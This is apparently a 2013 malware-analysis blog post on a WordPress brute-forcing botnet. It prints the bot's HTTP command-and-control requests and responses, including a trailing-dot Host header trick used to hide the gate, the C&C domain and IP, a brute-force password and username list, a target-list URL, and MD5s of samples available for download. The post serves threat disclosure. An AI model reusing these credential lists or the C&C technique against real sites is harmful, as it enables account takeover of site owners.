Resolved google-analytics.pw to 89.45.14.74
Yet another wordpress brute forcing botnet. This one is different from the previously posted one as it uses HTTP for it’s C&C server.
It gets a bit tricky, as it tries to hide it’s gate by sending
Host: google-analytics.pw.
In the request instead of
Host: google-analytics.pw
Here is a correct request
GET /cmd.php HTTP/1.0 Host: google-analytics.pw. Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) HTTP/1.1 200 OK Date: Sun, 08 Sep 2013 18:59:04 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 67 Connection: close Content-Type: text/html; charset=UTF-8 1 30 hxxp://google-analytics.pw/pass_bot_pull/952536.txt steven 480
952536.txt (mirror) is a list of 5000 wordpress sites for the bot to try and brute force using the password “steven”
The usernames to use are grabbed from the server using the same method as the gate file
GET /login.txt HTTP/1.0 Host: google-analytics.pw. Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) HTTP/1.1 200 OK Date: Sun, 08 Sep 2013 18:59:06 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Wed, 04 Sep 2013 21:47:35 GMT ETag: "a0434-ab-4e595c0dfad70" Accept-Ranges: bytes Content-Length: 171 Connection: close Content-Type: text/plain; charset=UTF-8 Administrator admin adm system service user user1 user2 user3 temp tester office director manager test support root .......................... ..........
The pcap file from malwr.com is here, if anyone wants a more detailed look.
Hosting infos: http://whois.domaintools.com/89.45.14.74
Related md5s (Search on malwr.com to download samples)
Wordpress bruteforcer: 2fd2ac4dc99709fbac3fee09a9e92178
EDIT: This is apparently part of the “Fort Disco” campaign.